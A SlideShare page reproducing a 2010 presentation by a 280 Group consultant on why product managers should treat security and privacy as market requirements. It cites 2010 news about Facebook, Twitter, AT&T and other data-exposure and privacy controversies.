What Every Product
         Manager Needs to Know
             About Security
           Protecting Your Brand and
       ...
Agenda

 •       Why Is Information Security Important?
 •       Causes of Website Insecurity
 •       Issues and Conseque...
Why is Information Security
              Important to You?
 • Effective privacy requires excellent security
         – no...
What Is Information Security?
 • Information security broadly defined
         – Confidentiality of data
            • Pri...
Threats to Website Security

 • Professional criminals, in organized gangs
         –   Eastern Europe, “Nigeria,” parts o...
Causes of Website Insecurity
   • Corporate policy
         – Business model monetizes private data
         – Complete in...
Corporate Policy Causing Privacy
               Issues
 • “Your Privacy Isn’t So Private” – San Jose
   Mercury-News, Tech...
Corporate Policy Causing Privacy
               Issues
 • “A Blurring Line: Private and Public” – NY
   Times, Bits column...
Corporate Policy: Facebook
                    Places issue
 • Facebook announced location service
   “Places” August 18, ...
Corporate Indifference:
             Uploaded Photos Uploaded To
            Websites Reveal Exact Location
• “Geotags” in...
Issues From Poor Operations and
         Programming Practices
  • The “niece’s blog” – not so private
          – The aun...
Issues From Poor Operations and
          Programming Practices
• Application reveals credit card numbers




 Page 12    ...
Issues From Poor Operations and
          Programming Practices
• Not enough
  testing
  – http://techie-
    buzz.com/tec...
Issues From Poor Operations and
         Programming Practices
• Insufficient
  testing or poor
  configuration
  reveals ...
Issues From Poor Operations and
            Programming Practices
• Hackers
  successfully
  penetrate well-
  known site
...
Issues from Poor Operations
             and Programming Practices
  • AT&T website
    exposed phone IDs
    email addres...
User Education: “Forget Email...
      Social's the New Spam Vector”
• “… this shift in spammer strategy from email to
  s...
Privacy Issue Consequences

  • Sun Microsystems Alumni Assn. threads
    about security on Facebook and Yahoo
          –...
Privacy Issue Consequences

  • “Facebook Seeps Onto Other Web Sites,” -
    NY Times, April 19, 2010
          – Analysts...
Privacy Issue Consequences

  • Increased Privacy Concerns – “Tell-All
    Generation Keeps Some Things Offline,” –
    NY...
Mark Zuckerberg Doesn’t Value Privacy


  • January 9, 2010




  • April 23, 2010




Page 21                            ...
Zuckerberg Admits Mistakes About Privacy


  • May 24, 2010




Page 22                                         ©2010 280 ...
Zuckerberg Public Letter Really
       Targets Federal Government
  • Zuckerberg letter to blogger and
    Op-Ed piece in ...
Damage to Facebook Brand

  • Why Facebook’s “private” messages are a joke,
    Jesse Stanchak on May 6, 2010,
          h...
Damage to Facebook Brand

  • Facebook, privacy settings and taking control of
    your personal brand online, 26th May 20...
A Different View of User Privacy

  • Steve Jobs on privacy:
          – “ … different view … than some of our colleagues
...
More Consequences

  • June, 2010 Consumers Reports
          – Two out of three online U.S. households use social network...
Eric Schmidt calling for a “Young Adult
       Witness Protection Program?”

  • “[Schmidt ]predicts, apparently seriously...
Brand Damage: Poor Opinion of
          Social Media websites
  • ForeSee Results, Annual E-Business Report for the
    Am...
“Social Insecurity”
"We're just at the beginning (italics added for
emphasis) of seeing what the implications are for so
m...
Is This the Future?




Page 31                         ©2010 280 Group LLC
Privacy Issue Consequences
  “Cookies' Cause Bitter Backlash” -- Wall
    Street Journal, September 19,2010,
          htt...
Twitter Settles Federal Trade
              Commission Charges
• FTC charged Twitter deceived consumers and put
  privacy ...
A Legal Precedent for User
                Privacy Legislation
  • State privacy laws - California SB 1386
          – Eff...
Market Requirements

  • Well-researched Market Requirements
    should cover both stated and unstated
    (latent) needs
...
Market Requirements

  • Who understands security (privacy) ?
          – Almost all end users (business, consumer/home)
 ...
Market Requirements

  • Product manager must take leadership role to
    articulate unspoken market requirements
        ...
Market Requirements

  • User Education
          – Educated about managing their data
          – Educated about privacy ...
Market Requirements
  • Programing, Administration and Operations
          –   Test all changes to prevent exposure of us...
Takeaway Ideas

  • You must understand the business
    consequences of poor security and privacy
          – It’s only y...
280 Group Free Resources

     •    Free templates and white papers
     •    2009 Product Management Survey Results
     ...
280 Group
The Product Marketing & Product Management Experts™


     •    Consulting & Contractors
     •    Toolkits & PM...
Closure

  • Questions

  • Contact me later
    – phil@280group.com
    – (650) 766 9970
    – http://tungle.me/philburto...
Upcoming SlideShare
Loading in...5
×

What every product manager needs to know about security

2,224

Published on

About The AIPMM
The Association of International Product Marketing and Management (AIPMM), founded in 1998, promotes worldwide excellence in product management education and provides training, education, certification and professional networking opportunities. With members in 65 countries, the AIPMM is the Worldwide Certifying Body of product team professionals and offers globalized trainings and credentials localized for specific markets designed to meet the challenges of a constantly changing business landscape. As the only professional organization that addresses the entire product lifecycle from inception to obsolescence in any industry, the AIPMM supports strategic partners with offerings in Europe, the Middle East, Australia, and SouthEast Asia, as well as North America.

AIPMM Membership benefits include the national Product Management Educational Conference, regional conferences, the Career Center, peer Forums, tools, templates, publications and eligibility to enroll in the Certification Programs. The Agile Certified Product Manager® (ACPM), Certified Product Manager® (CPM), Certified Product Marketing Manager® (CPMM), Certified Brand Manager® (CBM), and Certified Innovation Leader (CIL) programs allow individual members to demonstrate their level of expertise and provide corporate members an assurance that their product professionals are operating at peak performance.
http://www.AIPMM.com
Subscribe: http://www.aipmm.com/subscribe
LinkedIn: http://www.linkedin.com/company/aipmm
Membership: http://www.aipmm.com/join.php
Certification: http://aipmm.com/html/certification
Webinar Series: http://aipmm.com/aipmm_webinars/
Articles: http://www.aipmm.com/html/newsletter/article.php

Published in: Business
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
2,224
On Slideshare
0
From Embeds
0
Number of Embeds
4
Actions
Shares
0
Downloads
29
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Transcript of "What every product manager needs to know about security"

  1. 1. What Every Product Manager Needs to Know About Security Protecting Your Brand and Revenue Phil Burton, Principal Consultant and Trainer 280 Group LLC © 2010 280 Group LLC Page 1 ©2010 280 Group LLC
  2. 2. Agenda • Why Is Information Security Important? • Causes of Website Insecurity • Issues and Consequences • Market Requirements • Takeaway Ideas Page 2 ©2010 280 Group LLC
  3. 3. Why is Information Security Important to You? • Effective privacy requires excellent security – not always understood by “privacy advocates” • Lack of effective privacy (security) can damage your business model loss of trust and reputation brand damage Decreases in site visitors lower revenue • Real risk of government regulation in US, EU Page 3 ©2010 280 Group LLC
  4. 4. What Is Information Security? • Information security broadly defined – Confidentiality of data • Privacy • Controlled access – Integrity of data and systems • Data has not been modified • Systems function as intended – Availability of systems and data • Systems online and functioning • Data available whenever needed • Traditional applications protect corporate networks and consumer systems Page 4 ©2010 280 Group LLC
  5. 5. Threats to Website Security • Professional criminals, in organized gangs – Eastern Europe, “Nigeria,” parts of Asia – Anywhere in the world – Relatively risk free and no geographic limitations – Using social media websites to distribute malware that gets downloaded to users’ systems • Repressive governments – China, “cyberwar” • New developments almost daily Page 5 ©2010 280 Group LLC
  6. 6. Causes of Website Insecurity • Corporate policy – Business model monetizes private data – Complete indifference to privacy issues • Poor operations and programming practices – Badly designed, buggy software and configurations – Hackers “contribute” content with malware or forcefully plant malware • Lack of user education – Users don’t know how or why to protect private data – “Social Engineering” tricks users Page 6 ©2010 280 Group LLC
  7. 7. Corporate Policy Causing Privacy Issues • “Your Privacy Isn’t So Private” – San Jose Mercury-News, Tech Files column, May 3, 2010 – Facebook is “cavalier” with privacy of its users – “Alarm bells went off in my head over the privacy issues” – “Astonishing how much information Facebook now considers ‘public’ and is sharing with its marketing partners” • Facebook login allows users to log in to other websites Page 7 ©2010 280 Group LLC
  8. 8. Corporate Policy Causing Privacy Issues • “A Blurring Line: Private and Public” – NY Times, Bits column, March 15, 2010 – Google Buzz service “complete disaster” by linking email accounts to status updates on social networks – Facebook makes members information public by default – Issue is “broader muddying of the line between what is private and what is public online.” Page 8 ©2010 280 Group LLC
  9. 9. Corporate Policy: Facebook Places issue • Facebook announced location service “Places” August 18, 2010 • Immediate criticism of default “opt-in” – No single opt-out setting – No ability to control which people can see check-in – Can “check-in” friends without permission – Available to Facebook partners and phone apps Page 9 ©2010 280 Group LLC
  10. 10. Corporate Indifference: Uploaded Photos Uploaded To Websites Reveal Exact Location • “Geotags” in uploaded photos identify exact location • Children, friends, houses, expensive cars, etc. • Website APIs make it easy for criminals and stalkers to locate on Google Maps – “Cyber-casing” • Users “compromising their privacy, if not their safety” • Illegal under copyright law to strip out all “metadata” from photos • Smartphones and websites need better user controls Page 10 ©2010 280 Group LLC
  11. 11. Issues From Poor Operations and Programming Practices • The “niece’s blog” – not so private – The aunt periodically did Google search on nieces and nephews to keep up with their activities – The niece was college freshman – Wrote one blog for parents and relatives – Wrote a second blog for just for friends • Password protected • Drugs, sex, wild parties, disparaging comments on family • Google found it with normal “spidering” Page 11 ©2010 280 Group LLC
  12. 12. Issues From Poor Operations and Programming Practices • Application reveals credit card numbers Page 12 ©2010 280 Group LLC
  13. 13. Issues From Poor Operations and Programming Practices • Not enough testing – http://techie- buzz.com/tech- news/credit- card-numbers- of-blippy-users- show-up-on- google.html (April 23, 2010) Page 13 ©2010 280 Group LLC
  14. 14. Issues From Poor Operations and Programming Practices • Insufficient testing or poor configuration reveals private chats on Facebook Page 14 ©2010 280 Group LLC
  15. 15. Issues From Poor Operations and Programming Practices • Hackers successfully penetrate well- known site – Hackers plant “Drive-by downloads” on poorly protected sites • safeweb.norton. com/buzz Page 15 ©2010 280 Group LLC
  16. 16. Issues from Poor Operations and Programming Practices • AT&T website exposed phone IDs email addresses of 114,000 iPad owners – dozens of CEOs, military officials, and top politicians – FBI investigating – Wall Street Journal, June 11, 2010 Page 16 ©2010 280 Group LLC
  17. 17. User Education: “Forget Email... Social's the New Spam Vector” • “… this shift in spammer strategy from email to social networking sites tracks perfectly with users' online behavior” • “spammers are counting on … our collective naïveté.” Page 17 ©2010 280 Group LLC
  18. 18. Privacy Issue Consequences • Sun Microsystems Alumni Assn. threads about security on Facebook and Yahoo – My yahoo e-mail account was hacked about a year ago. … When I tried to report this to yahoo support, I received a return e-mail asking for my account name and password. – Obviously, this account is toast for anything but the most casual use. … I regard Yahoo mail, Facebook, and any social networking site as a threat to my security and use such things very little. Page 18 ©2010 280 Group LLC
  19. 19. Privacy Issue Consequences • “Facebook Seeps Onto Other Web Sites,” - NY Times, April 19, 2010 – Analysts say Facebook’s desire to spread its tentacles across the Web could run into privacy hurdles, as it will require the company to share increasing amounts of personal information about its users with other sites. – “They are going to have to secure more consumers’ approval for data-sharing,” said Augie Ray, analyst at Forrester Research. Page 19 ©2010 280 Group LLC
  20. 20. Privacy Issue Consequences • Increased Privacy Concerns – “Tell-All Generation Keeps Some Things Offline,” – NY Times, May 9, 2010 – “Mistrust of the intentions of social sites appears to be pervasive … telephone survey found 88 percent of 18- to 24-year olds said there should be a law … to delete stored information [on social media websites.] – “Two weeks ago, Senator Charles Schumer … petitioned the Federal Trade Commission to review privacy policies of social networks.” Page 20 ©2010 280 Group LLC
  21. 21. Mark Zuckerberg Doesn’t Value Privacy • January 9, 2010 • April 23, 2010 Page 21 ©2010 280 Group LLC
  22. 22. Zuckerberg Admits Mistakes About Privacy • May 24, 2010 Page 22 ©2010 280 Group LLC
  23. 23. Zuckerberg Public Letter Really Targets Federal Government • Zuckerberg letter to blogger and Op-Ed piece in Wash. Post, May 24, 2010 -- http://www.washingtonpost.com/wp- dyn/content/article/2010/05/23/AR2010052303828.html – “There needs to be a simpler way to control your information," he wrote. "In the coming weeks, we will add privacy controls that are much simpler to use. We will also give you an easy way to turn off all third-party services.” – First response to “furor over Facebook's user privacy moves that left the site with a public relations problem and fighting to defend its reputation.” Page 23 ©2010 280 Group LLC
  24. 24. Damage to Facebook Brand • Why Facebook’s “private” messages are a joke, Jesse Stanchak on May 6, 2010, http://smartblogs.com/socialmedia/2010/05/06/why-facebooks- private-messages-are-a-joke/ • ACLU Weighs in on Facebook’s Privacy Issues, Rex Gradeless, May 13, 2010, http://socialmedialawstudent.com/featured/aclu-weighs-in-on- facebooks-privacy-issues/ • 6 Alternatives to Facebook, Itamar Kestenbaum, May 20, 2010, http://www.socialmediatoday.com/SMC/199443 Page 24 ©2010 280 Group LLC
  25. 25. Damage to Facebook Brand • Facebook, privacy settings and taking control of your personal brand online, 26th May 2010, Matt Rhodes, http://www.freshnetworks.com/blog/2010/05/facebook- privacy-settings-and-taking-control-of-your-personal-brand-online/ • Social Media: The Privacy and Security Repercussions, Johnny Widerlund, Search Engine Watch, Jun 19, 2010, http://searchenginewatch.com/3640696 • Give some thought to social media and privacy, Janet, July 9, 2010, http://janetfouts.com/social-media-privacy/ Page 25 ©2010 280 Group LLC
  26. 26. A Different View of User Privacy • Steve Jobs on privacy: – “ … different view … than some of our colleagues in the Valley. We take privacy very seriously.” – “Privacy means people know what they’re signing up for. In plain English. … repeatedly” – “Let them know precisely what you’re going to do with their data.” – Wall Street Journal, Technology, Kara Swisher and Walt Mossberg, June 7, 2010, p. R3. Page 26 ©2010 280 Group LLC
  27. 27. More Consequences • June, 2010 Consumers Reports – Two out of three online U.S. households use social networks such as Facebook and MySpace, nearly twice as many as a year ago. – But “millions … put themselves and their families at risk by exposing very sensitive personal information,” … national survey of 2,000 online households conducted in January. Page 27 ©2010 280 Group LLC
  28. 28. Eric Schmidt calling for a “Young Adult Witness Protection Program?” • “[Schmidt ]predicts, apparently seriously, that every young person one day will be entitled automatically to change his or her name on reaching adulthood in order to disown youthful hijinks stored on their friends' social media sites.” • Technical solution to important policy issue? • Doesn’t Google have any responsibility here? Page 28 ©2010 280 Group LLC
  29. 29. Brand Damage: Poor Opinion of Social Media websites • ForeSee Results, Annual E-Business Report for the American Customer Satisfaction Index (ACSI), July 20, 2010 – http://www.foreseeresults.com/research-white- papers/ACSI-e-business-report-2010.shtml • “…interviews with approx. 70,000 customers …to measure satisfaction with more than 200 companies in 44 industries and 10 economic sectors” • Key finding: “Social Media: Customer satisfaction with social media sites is poor (70) … lowest industry aggregate score of any of the e-business or e-retail industries.” – Better than only airlines and subscription TV (66) Page 29 ©2010 280 Group LLC
  30. 30. “Social Insecurity” "We're just at the beginning (italics added for emphasis) of seeing what the implications are for so much information being posted on social networks," Nicole Ozer, the technology and civil liberties policy director .. ACLU, N Cal. Page 30 ©2010 280 Group LLC
  31. 31. Is This the Future? Page 31 ©2010 280 Group LLC
  32. 32. Privacy Issue Consequences “Cookies' Cause Bitter Backlash” -- Wall Street Journal, September 19,2010, http://online.wsj.com/article_email/SB10001424052748704416904575502261335698370- lMyQjAxMTAwMDIwMDEyNDAyWj.html • Companies now using “Flash cookies” that can “re- spawn” after being deleted by user • Six lawsuits filed since July • "There are some in the industry who do not believe that users should be able to block tracking…," Chris Hoofnagle, director, Berkeley Center for Law & Technology's information-privacy programs • Two bills introduced into Congress • Federal Trade Commission expected to issue new guidelines by December. Page 32 ©2010 280 Group LLC
  33. 33. Twitter Settles Federal Trade Commission Charges • FTC charged Twitter deceived consumers and put privacy at risk • First case by FTC against social media site • Complaint charged poor security allowed hackers to gain admin control, send phony tweets • Twitter barred for 20 years from misleading consumers about security, privacy, confidentiality, also must create comprehensive security program, with outside auditing Page 33 ©2010 280 Group LLC
  34. 34. A Legal Precedent for User Privacy Legislation • State privacy laws - California SB 1386 – Effective July 1, 2003 – Requires an agency, person or business that conducts business in California …to disclose any breach of security (to any resident). – Similar laws now in force in 46 states in US • What would be the impact if these laws were extended to general privacy issues? Page 34 ©2010 280 Group LLC
  35. 35. Market Requirements • Well-researched Market Requirements should cover both stated and unstated (latent) needs – Waterfall or Agile, both need Requirements • Security needs not called out because they are “universally understood” or perhaps not understood Page 35 ©2010 280 Group LLC
  36. 36. Market Requirements • Who understands security (privacy) ? – Almost all end users (business, consumer/home) do not begin to understand security issues – Most Line of Business owners prioritize time-to- market, or won’t invest in effective security – Most product managers don’t understand security – Many software developers do not know how to write secure code – IT often deploys insecure websites and networks Page 36 ©2010 280 Group LLC
  37. 37. Market Requirements • Product manager must take leadership role to articulate unspoken market requirements – Protect your company’s brand and revenue – Perhaps protect your career • Security and Privacy Policy – User privacy respected by web site owner company and third parties, including advertisers – User data protected from unauthorized access by individuals and companies Page 37 ©2010 280 Group LLC
  38. 38. Market Requirements • User Education – Educated about managing their data – Educated about privacy implications of sharing data – Provided with effective and timely advice and warnings about social engineering attacks – Get effective help if they suspect security issue Page 38 ©2010 280 Group LLC
  39. 39. Market Requirements • Programing, Administration and Operations – Test all changes to prevent exposure of user data – Simplify data sharing options and default to NONE – Ensure that user posted content is safe – Detect and remove malware planted by hackers – Work with security vendors on emerging threats – Notify users proactively of security breaches, even if not required by law – Include partners in security programs – Maintain ongoing programs and provide sufficient resources, including outside help Page 39 ©2010 280 Group LLC
  40. 40. Takeaway Ideas • You must understand the business consequences of poor security and privacy – It’s only your company’s business model and maybe your career • As the product champion, you must articulate the issues and document the requirements inside your organization • You do not have to be security expert • Read my blog - www.280group.com/blog/ Page 40 ©2010 280 Group LLC
  41. 41. 280 Group Free Resources • Free templates and white papers • 2009 Product Management Survey Results • PM Job listing sites • 280 Group Product Management 2.0 Newsletter • 280 LinkedIn Group • Product Management 2.0 Blog • Books • PMA listings Go to www.280group.com in the “Resources” section. Page 41 ©2010 280 Group LLC
  42. 42. 280 Group The Product Marketing & Product Management Experts™ • Consulting & Contractors • Toolkits & PM Office™ (Product Manager’s, Roadmaps, Launches, Beta, Reviews) • Training: public & private – PM Fast Track™ – Agile Excellence for Product Managers – Customer & Market Research – Effective Decision Making – Interactivity & Communication – Market Value Pricing – Personal Strategic Plans For PMs – Time Management & Productivity – GREAT Demos! • Certifications: • Self-Study & In-Person Courses – Agile Certified Product Manager™ – Certified Product Manager™ – Certified Product Marketing Manager™ Page 42 ©2010 280 Group LLC
  43. 43. Closure • Questions • Contact me later – phil@280group.com – (650) 766 9970 – http://tungle.me/philburton to set up an appointment Page 43 ©2010 280 Group LLC

×